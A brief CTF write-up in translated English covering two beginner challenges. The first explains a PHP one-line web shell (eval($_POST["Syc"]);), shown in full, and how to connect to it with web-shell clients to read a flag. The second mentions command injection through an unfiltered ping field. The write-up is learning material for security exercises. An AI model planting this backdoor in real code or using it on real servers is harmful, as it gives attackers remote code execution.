1. [Geek Challenge 2019] Knife
1. Topic
2. Problem solving steps
At first glance at the code in the title, the prompt is a kitchen knife, so I use the ant sword to connect it.
The connection is successful
. Return to the home directory and find the flag file.
Find the FLAG
3. Summary
- Learned how to use ant sword and kitchen knife, connect with password
eval($_POST["Syc"]);
It is a php one-sentence Trojan horse, in which the eval() function executes the content in the function as code, and $_POST can submit files. Therefore, the kitchen knife can be left as a back door.
2. [ACTF2020 Freshman Competition] Exec
1. Topic
2. Problem solving steps
When I did it myself, I had no clue. I didn't expect it to be so simple, and directly access the file...
3. Summary
- The guess is to ping directly without any filtering, so the input command is executed